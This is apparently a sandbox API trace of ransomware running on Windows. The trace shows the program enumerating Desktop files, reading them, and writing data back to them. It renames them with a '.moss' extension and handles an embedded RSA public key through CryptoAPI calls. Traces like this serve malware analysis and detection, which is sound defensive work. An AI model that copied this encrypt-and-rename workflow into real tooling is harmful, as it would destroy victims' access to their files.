[0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45398 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd98 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdc8 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbde0 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.272] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b447b0 [0169.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdc8 | out: hHeap=0xcd0000) returned 1 [0169.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbde0 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbdc8 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdc8 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.273] GetCurrentThreadId () returned 0x324 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31e50 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.274] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.274] GetCurrentThreadId () returned 0x324 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.274] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.274] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.274] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.274] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.274] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.274] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.274] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdc8 [0169.275] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.275] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbde0 [0169.275] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.275] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdb0 [0169.275] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.275] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.275] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.275] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.275] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbdf8 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdc8 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbdc8 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b5e8b0 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b5eac0 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.276] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.276] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdc8 | out: hHeap=0xcd0000) returned 1 [0169.277] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b447b0 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.277] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5eac0 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdf8 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdb0 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.277] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd98 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45398 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5e8b0 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.278] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.278] WriteFile (in: hFile=0x664, lpBuffer=0x3b53ea8*, nNumberOfBytesToWrite=0xa9fd, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b53ea8*, lpNumberOfBytesWritten=0x401fb14*=0xa9fd, lpOverlapped=0x0) returned 1 [0169.279] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b53ea8 | out: hHeap=0xcd0000) returned 1 [0169.279] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xaa02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.279] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.279] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.279] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.279] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.279] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.279] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.279] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.279] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.279] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.279] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.279] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.279] CloseHandle (hObject=0x664) returned 1 [0169.281] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.281] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.281] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0169.281] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JEFgYE2 YDdJSyFXdv.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jefgye2 yddjsyfxdv.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JEFgYE2 YDdJSyFXdv.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jefgye2 yddjsyfxdv.swf.moss")) returned 1 [0169.282] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.282] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.282] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.283] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.284] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e87e510, ftCreationTime.dwHighDateTime=0x1d5e1a7, ftLastAccessTime.dwLowDateTime=0x67a26f60, ftLastAccessTime.dwHighDateTime=0x1d5e66d, ftLastWriteTime.dwLowDateTime=0x67a26f60, ftLastWriteTime.dwHighDateTime=0x1d5e66d, nFileSizeHigh=0x0, nFileSizeLow=0x18b18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KDhrAhNu6jQBzP8T.xls", cAlternateFileName="KDHRAH~1.XLS")) returned 1 [0169.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.284] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KDhrAhNu6jQBzP8T.xls") returned=".xls" [0169.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KDhrAhNu6jQBzP8T.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kdhrahnu6jqbzp8t.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.284] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=101144) returned 1 [0169.284] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.289] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18af2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.289] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.290] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.290] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x18b18, lpOverlapped=0x0) returned 1 [0169.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.292] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.292] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.293] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.293] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.294] 